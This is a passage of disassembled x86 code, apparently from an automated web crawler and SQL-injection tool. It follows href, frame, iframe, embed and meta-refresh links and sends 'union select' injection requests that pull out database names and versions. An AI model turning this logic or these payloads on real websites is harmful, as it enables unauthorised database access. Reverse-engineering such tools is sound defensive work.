mov byte ptr [ebp-4], 10h
call sub_419A5E
mov ecx, eax
call sub_419A8C
push eax
call sub_42A100
pop ecx
mov [edi+40h], eax
lea ecx, [ebp-5Ch]
call sub_41968F
and byte ptr [ebp-4], 0
lea ecx, [ebp-4Ch]
call sub_41968F
cmp dword ptr [edi+40h], 0
jnz short loc_419FD9
push offset aHttp ; "http"
mov ecx, edi
call sub_419788
test eax, eax
jnz short loc_419FC2
mov dword ptr [edi+40h], 50h
loc_419FC2: ; CODE XREF: sub_419C4E+36B�j
push offset aFtp ; "ftp"
mov ecx, edi
call sub_419788
test eax, eax
jnz short loc_419FD9
mov dword ptr [edi+40h], 15h
loc_419FD9: ; CODE XREF: sub_419C4E+2B5�j
; sub_419C4E+35B�j ...
push esi
lea ecx, [ebp-1Ch]
call sub_419820
push eax
lea eax, [ebp-2Ch]
push eax
lea ecx, [ebp-1Ch]
call sub_4198F0
push esi
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 11h
call sub_419820
push eax
lea eax, [ebp-5Ch]
push eax
lea ecx, [ebp-2Ch]
call sub_4198F0
push eax
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 12h
call sub_419A7D
lea ecx, [ebp-5Ch]
mov byte ptr [ebp-4], 11h
call sub_41968F
push esi
lea ecx, [ebp-2Ch]
call sub_419820
push eax
lea eax, [ebp-5Ch]
push eax
lea ecx, [ebp-2Ch]
call sub_4198F0
push eax
lea ecx, [ebp-2Ch]
mov byte ptr [ebp-4], 13h
call sub_419A7D
lea ecx, [ebp-5Ch]
mov byte ptr [ebp-4], 11h
call sub_41968F
add edi, 44h
push esi
mov ecx, edi
call sub_4196C2
lea eax, [ebp-2Ch]
mov ecx, edi
push eax
call sub_419770
lea ecx, [ebp-2Ch]
call sub_41968F
xor esi, esi
inc esi
loc_41A072: ; CODE XREF: sub_419C4E+80�j
; sub_419C4E+133�j
lea ecx, [ebp-1Ch]
call sub_41968F
pop edi
mov eax, esi
pop ebx
loc_41A07E: ; CODE XREF: sub_419C4E+17�j
mov ecx, [ebp-0Ch]
pop esi
mov large fs:0, ecx
leave
retn
sub_419C4E endp
; ---------------------------------------------------------------------------
loc_41A08B: ; DATA XREF: sub_40A9FE+8094�o
mov eax, offset loc_4365D0
call sub_42B7CC
sub esp, 0C40h
mov eax, [ebp+8]
push ebx
push esi
push edi
mov ecx, 22Ah
mov esi, eax
lea edi, [ebp-0C4Ch]
xor ebx, ebx
rep movsd
mov dword ptr [eax+8A4h], 1
mov eax, [ebp-0C4Ch]
lea ecx, [ebp-1F4h]
mov [ebp-34h], eax
mov [ebp-48h], ebx
call sub_41B149
mov [ebp-4], ebx
call dword_437188 ; GetTickCount
push eax
call sub_429B8F
lea eax, [ebp-1F4h]
push eax
lea eax, [ebp-0C48h]
push eax
call sub_419C4E
add esp, 0Ch
test eax, eax
jnz short loc_41A161
cmp [ebp-3ACh], ebx
mov esi, offset aFailedToParse_ ; "Failed to parse."
jnz short loc_41A124
cmp [ebp-3B0h], ebx
jnz short loc_41A12C
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CE4A
add esp, 0Ch
loc_41A124: ; CODE XREF: .text:0041A107�j
cmp [ebp-3B0h], ebx
jz short loc_41A13F
loc_41A12C: ; CODE XREF: .text:0041A10F�j
lea eax, [ebp-448h]
push esi
push eax
push dword ptr [ebp-34h]
call sub_41CDD4
add esp, 0Ch
loc_41A13F: ; CODE XREF: .text:0041A12A�j
or dword ptr [ebp-4], 0FFFFFFFFh
lea ecx, [ebp-1F4h]
call sub_41B173
mov ecx, [ebp-0Ch]
pop edi
pop esi
xor eax, eax
pop ebx
mov large fs:0, ecx
leave
retn 4
; ---------------------------------------------------------------------------
loc_41A161: ; CODE XREF: .text:0041A0FA�j
xor eax, eax
cmp off_446358, ebx
jz short loc_41A175
loc_41A16B: ; CODE XREF: .text:0041A173�j
inc eax
cmp off_446358[eax*4], ebx
jnz short loc_41A16B
loc_41A175: ; CODE XREF: .text:0041A169�j
dec eax
cmp [ebp-3C0h], ebx
mov [ebp-0D0h], eax
jle loc_41B0C8
mov esi, offset asc_43D938 ; " "
mov edi, offset asc_44736C ; "="
loc_41A192: ; CODE XREF: .text:0041B0C2�j
push dword ptr [ebp-0D0h]
push ebx
call sub_41E415
mov eax, off_446358[eax*4]
pop ecx
pop ecx
mov [ebp+8], eax
lea ecx, [ebp-30h]
call sub_419617
lea ecx, [ebp-20h]
call sub_419617
cmp dword ptr [ebp-3C4h], 50h
mov byte ptr [ebp-4], 2
lea ecx, [ebp-1E4h]
jnz short loc_41A1E6
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4197A9
add esp, 0Ch
jmp short loc_41A203
; ---------------------------------------------------------------------------
loc_41A1E6: ; CODE XREF: .text:0041A1CB�j
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4197A9
add esp, 10h
loc_41A203: ; CODE XREF: .text:0041A1E4�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-1B0h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-1F4h]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-0CCh]
push eax
call sub_419B11
add esp, 0Ch
mov byte ptr [ebp-4], 3
jmp loc_41B059
; ---------------------------------------------------------------------------
loc_41A25B: ; CODE XREF: .text:0041B05F�j
lea ecx, [ebp-0ACh]
call sub_41B149
push 3Ch
lea ecx, [ebp-0CCh]
mov byte ptr [ebp-4], 4
call sub_4197E2
test eax, eax
jz loc_41B067
push 3Ch
lea ecx, [ebp-0CCh]
call sub_4197E2
push eax
lea eax, [ebp-0F0h]
push eax
lea ecx, [ebp-0CCh]
call sub_4198F0
lea eax, [ebp-0F0h]
lea ecx, [ebp-0CCh]
push eax
mov byte ptr [ebp-4], 5
call sub_419A7D
push 3Eh
lea ecx, [ebp-0CCh]
call sub_4197E2
dec eax
lea ecx, [ebp-0CCh]
push eax
lea eax, [ebp-44h]
push ebx
push eax
call sub_41985D
push esi
lea eax, [ebp-0BCh]
push ebx
push eax
lea ecx, [ebp-44h]
mov byte ptr [ebp-4], 6
call sub_419A5E
push offset aMeta ; "meta"
lea ecx, [ebp-0BCh]
mov byte ptr [ebp-4], 7
call sub_419798
test eax, eax
jnz loc_41A49B
push offset aRefresh ; "\"Refresh\""
lea ecx, [ebp-44h]
call sub_419820
test eax, eax
jz loc_41A49B
push esi
lea eax, [ebp-58h]
push 3
push eax
lea ecx, [ebp-44h]
call sub_419A5E
push 3Dh
lea ecx, [ebp-58h]
mov byte ptr [ebp-4], 8
call sub_4197E2
push eax
lea eax, [ebp-394h]
push eax
lea ecx, [ebp-58h]
call sub_4198F0
push eax
lea ecx, [ebp-0F0h]
mov byte ptr [ebp-4], 9
call sub_419A7D
lea ecx, [ebp-394h]
mov byte ptr [ebp-4], 8
call sub_41968F
lea eax, [ebp-0F0h]
lea ecx, [ebp-58h]
push eax
call sub_419A7D
lea ecx, [ebp-58h]
call sub_41DB5C
dec eax
lea ecx, [ebp-58h]
push eax
lea eax, [ebp-374h]
push ebx
push eax
call sub_41985D
push eax
lea ecx, [ebp-0F0h]
mov byte ptr [ebp-4], 0Ah
call sub_419A7D
lea ecx, [ebp-374h]
mov byte ptr [ebp-4], 8
call sub_41968F
lea eax, [ebp-0F0h]
lea ecx, [ebp-58h]
push eax
call sub_419A7D
lea eax, [ebp-58h]
lea ecx, [ebp-204h]
push eax
call sub_41966B
lea eax, [ebp-0ACh]
lea ecx, [ebp-204h]
push eax
mov byte ptr [ebp-4], 0Bh
call sub_419A8C
push eax
call sub_419C4E
pop ecx
test eax, eax
pop ecx
jz loc_41A488
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41A417
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4197A9
add esp, 0Ch
jmp short loc_41A431
; ---------------------------------------------------------------------------
loc_41A417: ; CODE XREF: .text:0041A3FC�j
push dword ptr [ebp-6Ch]
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4197A9
add esp, 10h
loc_41A431: ; CODE XREF: .text:0041A415�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-214h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-214h]
call sub_41968F
loc_41A488: ; CODE XREF: .text:0041A3EC�j
lea ecx, [ebp-204h]
call sub_41968F
lea ecx, [ebp-58h]
jmp loc_41B027
; ---------------------------------------------------------------------------
loc_41A49B: ; CODE XREF: .text:0041A2FF�j
; .text:0041A314�j
push offset dword_43DAAC
lea ecx, [ebp-0BCh]
call sub_419798
test eax, eax
jnz loc_41A83E
push esi
lea eax, [ebp-384h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419A5E
push edi
lea ecx, [ebp-110h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Ch
call sub_419A5E
lea ecx, [ebp-384h]
jmp short loc_41A542
; ---------------------------------------------------------------------------
loc_41A4E3: ; CODE XREF: .text:0041A55D�j
push offset byte_454A54
lea ecx, [ebp-110h]
call sub_419788
test eax, eax
jz short loc_41A55F
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-304h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push edi
lea ecx, [ebp-244h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 0Fh
call sub_419A5E
push eax
lea ecx, [ebp-110h]
mov byte ptr [ebp-4], 10h
call sub_41970F
lea ecx, [ebp-244h]
call sub_41968F
lea ecx, [ebp-304h]
loc_41A542: ; CODE XREF: .text:0041A4E1�j
mov byte ptr [ebp-4], 0Eh
call sub_41968F
lea ecx, [ebp-110h]
push offset aHref ; "href"
call sub_419798
test eax, eax
jnz short loc_41A4E3
loc_41A55F: ; CODE XREF: .text:0041A4F5�j
push offset byte_454A54
lea ecx, [ebp-110h]
call sub_419788
test eax, eax
jz loc_41A833
push esi
lea eax, [ebp-264h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push 1
push edi
lea ecx, [ebp-160h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 11h
call sub_419913
lea ecx, [ebp-264h]
call sub_41968F
lea ecx, [ebp-170h]
call sub_419617
push ebx
lea ecx, [ebp-160h]
mov byte ptr [ebp-4], 14h
call sub_419A82
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-160h]
jnz short loc_41A600
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-170h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4197A9
add esp, 14h
jmp short loc_41A660
; ---------------------------------------------------------------------------
loc_41A600: ; CODE XREF: .text:0041A5D0�j
push offset aHttp_0 ; "http://"
call sub_419820
test eax, eax
jz short loc_41A622
lea eax, [ebp-160h]
lea ecx, [ebp-170h]
push eax
call sub_41970F
jmp short loc_41A660
; ---------------------------------------------------------------------------
loc_41A622: ; CODE XREF: .text:0041A60C�j
lea ecx, [ebp-160h]
call sub_419A8C
push eax
lea ecx, [ebp-1B0h]
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-170h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4197A9
add esp, 18h
loc_41A660: ; CODE XREF: .text:0041A5FE�j
; .text:0041A620�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-170h]
push eax
call sub_419A8C
push eax
call sub_419C4E
pop ecx
test eax, eax
pop ecx
jz loc_41A81D
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41A6A7
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4197A9
add esp, 0Ch
jmp short loc_41A6C1
; ---------------------------------------------------------------------------
loc_41A6A7: ; CODE XREF: .text:0041A68C�j
push dword ptr [ebp-6Ch]
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4197A9
add esp, 10h
loc_41A6C1: ; CODE XREF: .text:0041A6A5�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-364h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-364h]
call sub_41968F
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSele ; "GET %s=-1+union+select+database(),versi"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-284h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-284h]
call sub_41968F
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSe_0 ; "GET %s=-1+union+select+1,2,concat_ws(0x"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-324h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-324h]
call sub_41968F
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
push dword ptr [ebp+8]
lea ecx, [ebp-68h]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetS1UnionSe_1 ; "GET %s=-1+union+select+1,2,concat_ws(ch"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-2A4h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-2A4h]
call sub_41968F
loc_41A81D: ; CODE XREF: .text:0041A67C�j
lea ecx, [ebp-170h]
call sub_41968F
lea ecx, [ebp-160h]
call sub_41968F
loc_41A833: ; CODE XREF: .text:0041A571�j
lea ecx, [ebp-110h]
jmp loc_41B027
; ---------------------------------------------------------------------------
loc_41A83E: ; CODE XREF: .text:0041A4AD�j
push offset off_446E38
lea ecx, [ebp-0BCh]
call sub_419798
test eax, eax
jnz loc_41AADC
push esi
lea eax, [ebp-3A4h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419A5E
push edi
lea ecx, [ebp-140h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 15h
call sub_419A5E
lea ecx, [ebp-3A4h]
jmp short loc_41A8E5
; ---------------------------------------------------------------------------
loc_41A886: ; CODE XREF: .text:0041A900�j
push offset byte_454A54
lea ecx, [ebp-140h]
call sub_419788
test eax, eax
jz short loc_41A902
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-344h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push edi
lea ecx, [ebp-2C4h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 18h
call sub_419A5E
push eax
lea ecx, [ebp-140h]
mov byte ptr [ebp-4], 19h
call sub_41970F
lea ecx, [ebp-2C4h]
call sub_41968F
lea ecx, [ebp-344h]
loc_41A8E5: ; CODE XREF: .text:0041A884�j
mov byte ptr [ebp-4], 17h
call sub_41968F
lea ecx, [ebp-140h]
push offset off_446E34
call sub_419798
test eax, eax
jnz short loc_41A886
loc_41A902: ; CODE XREF: .text:0041A898�j
push offset byte_454A54
lea ecx, [ebp-140h]
call sub_419788
test eax, eax
jz loc_41AAD1
push esi
lea eax, [ebp-2E4h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push 1
push edi
lea ecx, [ebp-0E0h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 1Ah
call sub_419913
lea ecx, [ebp-2E4h]
call sub_41968F
lea ecx, [ebp-1A0h]
call sub_419617
push ebx
lea ecx, [ebp-0E0h]
mov byte ptr [ebp-4], 1Dh
call sub_419A82
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-0E0h]
jnz short loc_41A9A3
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-1A0h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4197A9
add esp, 14h
jmp short loc_41AA03
; ---------------------------------------------------------------------------
loc_41A9A3: ; CODE XREF: .text:0041A973�j
push offset aHttp_0 ; "http://"
call sub_419820
test eax, eax
jz short loc_41A9C5
lea eax, [ebp-0E0h]
lea ecx, [ebp-1A0h]
push eax
call sub_41970F
jmp short loc_41AA03
; ---------------------------------------------------------------------------
loc_41A9C5: ; CODE XREF: .text:0041A9AF�j
lea ecx, [ebp-0E0h]
call sub_419A8C
push eax
lea ecx, [ebp-1B0h]
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-1A0h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4197A9
add esp, 18h
loc_41AA03: ; CODE XREF: .text:0041A9A1�j
; .text:0041A9C3�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-1A0h]
push eax
call sub_419A8C
push eax
call sub_419C4E
pop ecx
test eax, eax
pop ecx
jz loc_41AABB
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41AA4A
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4197A9
add esp, 0Ch
jmp short loc_41AA64
; ---------------------------------------------------------------------------
loc_41AA4A: ; CODE XREF: .text:0041AA2F�j
push dword ptr [ebp-6Ch]
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4197A9
add esp, 10h
loc_41AA64: ; CODE XREF: .text:0041AA48�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-224h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-224h]
call sub_41968F
loc_41AABB: ; CODE XREF: .text:0041AA1F�j
lea ecx, [ebp-1A0h]
call sub_41968F
lea ecx, [ebp-0E0h]
call sub_41968F
loc_41AAD1: ; CODE XREF: .text:0041A914�j
lea ecx, [ebp-140h]
jmp loc_41B027
; ---------------------------------------------------------------------------
loc_41AADC: ; CODE XREF: .text:0041A850�j
push offset aEmbed ; "embed"
lea ecx, [ebp-0BCh]
call sub_419798
test eax, eax
jnz loc_41AD7A
push esi
lea eax, [ebp-234h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419A5E
push edi
lea ecx, [ebp-130h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 1Eh
call sub_419A5E
lea ecx, [ebp-234h]
jmp short loc_41AB83
; ---------------------------------------------------------------------------
loc_41AB24: ; CODE XREF: .text:0041AB9E�j
push offset byte_454A54
lea ecx, [ebp-130h]
call sub_419788
test eax, eax
jz short loc_41ABA0
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-274h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push edi
lea ecx, [ebp-254h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 21h
call sub_419A5E
push eax
lea ecx, [ebp-130h]
mov byte ptr [ebp-4], 22h
call sub_41970F
lea ecx, [ebp-254h]
call sub_41968F
lea ecx, [ebp-274h]
loc_41AB83: ; CODE XREF: .text:0041AB22�j
mov byte ptr [ebp-4], 20h
call sub_41968F
lea ecx, [ebp-130h]
push offset off_446E34
call sub_419798
test eax, eax
jnz short loc_41AB24
loc_41ABA0: ; CODE XREF: .text:0041AB36�j
push offset byte_454A54
lea ecx, [ebp-130h]
call sub_419788
test eax, eax
jz loc_41AD6F
push esi
lea eax, [ebp-294h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push 1
push edi
lea ecx, [ebp-150h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 23h
call sub_419913
lea ecx, [ebp-294h]
call sub_41968F
lea ecx, [ebp-190h]
call sub_419617
push ebx
lea ecx, [ebp-150h]
mov byte ptr [ebp-4], 26h
call sub_419A82
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-150h]
jnz short loc_41AC41
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-190h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4197A9
add esp, 14h
jmp short loc_41ACA1
; ---------------------------------------------------------------------------
loc_41AC41: ; CODE XREF: .text:0041AC11�j
push offset aHttp_0 ; "http://"
call sub_419820
test eax, eax
jz short loc_41AC63
lea eax, [ebp-150h]
lea ecx, [ebp-190h]
push eax
call sub_41970F
jmp short loc_41ACA1
; ---------------------------------------------------------------------------
loc_41AC63: ; CODE XREF: .text:0041AC4D�j
lea ecx, [ebp-150h]
call sub_419A8C
push eax
lea ecx, [ebp-1B0h]
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-190h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4197A9
add esp, 18h
loc_41ACA1: ; CODE XREF: .text:0041AC3F�j
; .text:0041AC61�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-190h]
push eax
call sub_419A8C
push eax
call sub_419C4E
pop ecx
test eax, eax
pop ecx
jz loc_41AD59
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41ACE8
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4197A9
add esp, 0Ch
jmp short loc_41AD02
; ---------------------------------------------------------------------------
loc_41ACE8: ; CODE XREF: .text:0041ACCD�j
push dword ptr [ebp-6Ch]
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4197A9
add esp, 10h
loc_41AD02: ; CODE XREF: .text:0041ACE6�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-2B4h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-2B4h]
call sub_41968F
loc_41AD59: ; CODE XREF: .text:0041ACBD�j
lea ecx, [ebp-190h]
call sub_41968F
lea ecx, [ebp-150h]
call sub_41968F
loc_41AD6F: ; CODE XREF: .text:0041ABB2�j
lea ecx, [ebp-130h]
jmp loc_41B027
; ---------------------------------------------------------------------------
loc_41AD7A: ; CODE XREF: .text:0041AAEE�j
push offset aFrame ; "frame"
lea ecx, [ebp-0BCh]
call sub_419798
test eax, eax
jz short loc_41ADA6
push offset aIframe ; "iframe"
lea ecx, [ebp-0BCh]
call sub_419798
test eax, eax
jnz loc_41B02C
loc_41ADA6: ; CODE XREF: .text:0041AD8C�j
push esi
lea eax, [ebp-2D4h]
push ebx
push eax
lea ecx, [ebp-44h]
mov [ebp-10h], ebx
call sub_419A5E
push edi
lea ecx, [ebp-120h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 27h
call sub_419A5E
lea ecx, [ebp-2D4h]
jmp short loc_41AE35
; ---------------------------------------------------------------------------
loc_41ADD6: ; CODE XREF: .text:0041AE50�j
push offset byte_454A54
lea ecx, [ebp-120h]
call sub_419788
test eax, eax
jz short loc_41AE52
inc dword ptr [ebp-10h]
push esi
push dword ptr [ebp-10h]
lea eax, [ebp-314h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push edi
lea ecx, [ebp-2F4h]
push ebx
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 2Ah
call sub_419A5E
push eax
lea ecx, [ebp-120h]
mov byte ptr [ebp-4], 2Bh
call sub_41970F
lea ecx, [ebp-2F4h]
call sub_41968F
lea ecx, [ebp-314h]
loc_41AE35: ; CODE XREF: .text:0041ADD4�j
mov byte ptr [ebp-4], 29h
call sub_41968F
lea ecx, [ebp-120h]
push offset off_446E34
call sub_419798
test eax, eax
jnz short loc_41ADD6
loc_41AE52: ; CODE XREF: .text:0041ADE8�j
push offset byte_454A54
lea ecx, [ebp-120h]
call sub_419788
test eax, eax
jz loc_41B021
push esi
lea eax, [ebp-334h]
push dword ptr [ebp-10h]
lea ecx, [ebp-44h]
push eax
call sub_419A5E
push 1
push edi
lea ecx, [ebp-100h]
push 1
push ecx
mov ecx, eax
mov byte ptr [ebp-4], 2Ch
call sub_419913
lea ecx, [ebp-334h]
call sub_41968F
lea ecx, [ebp-180h]
call sub_419617
push ebx
lea ecx, [ebp-100h]
mov byte ptr [ebp-4], 2Fh
call sub_419A82
cmp byte ptr [eax], 2Fh
lea ecx, [ebp-100h]
jnz short loc_41AEF3
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-180h]
push offset aHttpSDS ; "http://%s:%d%s"
push eax
call sub_4197A9
add esp, 14h
jmp short loc_41AF53
; ---------------------------------------------------------------------------
loc_41AEF3: ; CODE XREF: .text:0041AEC3�j
push offset aHttp_0 ; "http://"
call sub_419820
test eax, eax
jz short loc_41AF15
lea eax, [ebp-100h]
lea ecx, [ebp-180h]
push eax
call sub_41970F
jmp short loc_41AF53
; ---------------------------------------------------------------------------
loc_41AF15: ; CODE XREF: .text:0041AEFF�j
lea ecx, [ebp-100h]
call sub_419A8C
push eax
lea ecx, [ebp-1B0h]
call sub_419A8C
push eax
lea ecx, [ebp-1E4h]
push dword ptr [ebp-1B4h]
call sub_419A8C
push eax
lea eax, [ebp-180h]
push offset aHttpSDSS ; "http://%s:%d%s%s"
push eax
call sub_4197A9
add esp, 18h
loc_41AF53: ; CODE XREF: .text:0041AEF1�j
; .text:0041AF13�j
lea eax, [ebp-0ACh]
lea ecx, [ebp-180h]
push eax
call sub_419A8C
push eax
call sub_419C4E
pop ecx
test eax, eax
pop ecx
jz loc_41B00B
cmp dword ptr [ebp-6Ch], 50h
lea ecx, [ebp-9Ch]
jnz short loc_41AF9A
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostS ; "Host: %s"
push eax
call sub_4197A9
add esp, 0Ch
jmp short loc_41AFB4
; ---------------------------------------------------------------------------
loc_41AF9A: ; CODE XREF: .text:0041AF7F�j
push dword ptr [ebp-6Ch]
call sub_419A8C
push eax
lea eax, [ebp-20h]
push offset aHostSD ; "Host: %s:%d"
push eax
call sub_4197A9
add esp, 10h
loc_41AFB4: ; CODE XREF: .text:0041AF98�j
lea eax, [ebp-848h]
lea ecx, [ebp-20h]
push eax
call sub_419A8C
push eax
lea ecx, [ebp-68h]
push dword ptr [ebp+8]
call sub_419A8C
push eax
lea eax, [ebp-30h]
push offset aGetSHttp1_1Acc ; "GET %s HTTP/1.1\r\nAccept: image/gif, ima"...
push eax
call sub_4197A9
add esp, 18h
lea eax, [ebp-0ACh]
lea ecx, [ebp-30h]
push eax
call sub_419A8C
push eax
lea eax, [ebp-354h]
push eax
call sub_419B11
add esp, 0Ch
lea ecx, [ebp-354h]
call sub_41968F
loc_41B00B: ; CODE XREF: .text:0041AF6F�j
lea ecx, [ebp-180h]
call sub_41968F
lea ecx, [ebp-100h]
call sub_41968F
loc_41B021: ; CODE XREF: .text:0041AE64�j
lea ecx, [ebp-120h]
